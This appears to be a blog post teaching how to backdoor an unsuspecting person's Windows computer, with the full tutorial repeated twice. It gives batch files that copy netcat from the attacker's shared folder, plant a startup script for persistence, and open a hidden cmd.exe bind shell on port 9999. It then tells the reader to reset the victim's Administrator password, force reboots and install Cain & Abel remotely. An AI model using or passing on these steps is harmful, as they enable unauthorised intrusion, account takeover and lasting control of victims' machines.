Now to do this you need a  very innocent target! As we all know a Trojan  is very liable to be  picked up by AV what you need is Net cat, it  opens a port on a computer  for access (If used correctly by a batch  file you open a port on a  target computer). You will need to write a  batch file. 
The batch file to copy net cat on the remote computer will have to be run from the target computer (The person on the target will have to implement the batch file in some way). Open Notepad and type this in:
Code
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
You save the file as a batch file using Notepad. The next batch file will be used to make sure the port you described opens up every time windows starts up and you can describe any port you wish. Open Notepad and type this:
Code
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad this will be the file that is copied into the startup folder in the previous batch file we wrote. You can connect the batch file to another file and share that file, let the target implement that file so that he can copy net cat and the other batch file onto his/hers computer therefore opening port 9999 after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:
net user Administrator newpassword
Now from here you can do what you want! Example: try closing down the target computer by browsing to his system32 folder and then type in:
shutdown -r -t 10 -c "Hello"
Then the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel slightly on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
The batch file to copy net cat on the remote computer will have to be run from the target computer (The person on the target will have to implement the batch file in some way). Open Notepad and type this in:
Code
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
You save the file as a batch file using Notepad. The next batch file will be used to make sure the port you described opens up every time windows starts up and you can describe any port you wish. Open Notepad and type this:
Code
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad this will be the file that is copied into the startup folder in the previous batch file we wrote. You can connect the batch file to another file and share that file, let the target implement that file so that he can copy net cat and the other batch file onto his/hers computer therefore opening port 9999 after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:
net user Administrator newpassword
Now from here you can do what you want! Example: try closing down the target computer by browsing to his system32 folder and then type in:
shutdown -r -t 10 -c "Hello"
Then the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel slightly on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
 
0 comments:
Post a Comment